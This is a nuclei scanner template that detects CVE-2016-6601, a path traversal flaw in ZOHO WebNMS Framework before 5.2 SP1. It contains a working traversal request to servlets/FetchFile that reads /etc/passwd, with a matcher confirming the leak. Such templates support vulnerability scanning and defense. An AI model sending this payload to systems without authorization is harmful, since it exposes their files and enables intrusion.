nuclei-templates/http/cves/2016/CVE-2016-6601.yaml

41 lines
1.3 KiB
YAML

id: CVE-2016-6601
info:
name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
reference:
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
- https://www.exploit-db.com/exploits/40229/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6601
- http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure
- http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-6601
cwe-id: CWE-22
epss-score: 0.97521
cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zohocorp
product: webnms_framework
tags: edb,cve,cve2016,zoho,lfi,webnms
http:
- method: GET
path:
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200